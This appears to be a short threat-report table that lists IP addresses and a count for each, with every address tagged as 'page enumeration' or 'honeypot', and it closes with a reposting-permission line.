| 107.172.5.251 | page enumeration | 3 |
| 20.235.49.124 | page enumeration | 2 |
| 213.226.123.100 | honeypot | 2 |
| 66.249.68.69 | page enumeration | 2 |
| 80.66.88.19 | honeypot | 2 |
| 101.132.194.222 | honeypot | 1 |
| 101.37.31.36 | page enumeration | 1 |
| 104.248.191.58 | honeypot | 1 |
| 104.248.79.33 | honeypot | 1 |
| 106.3.146.200 | honeypot | 1 |
| 106.91.5.195 | page enumeration | 1 |
| 107.172.83.34 | page enumeration | 1 |

© Reposting permitted with proper attribution.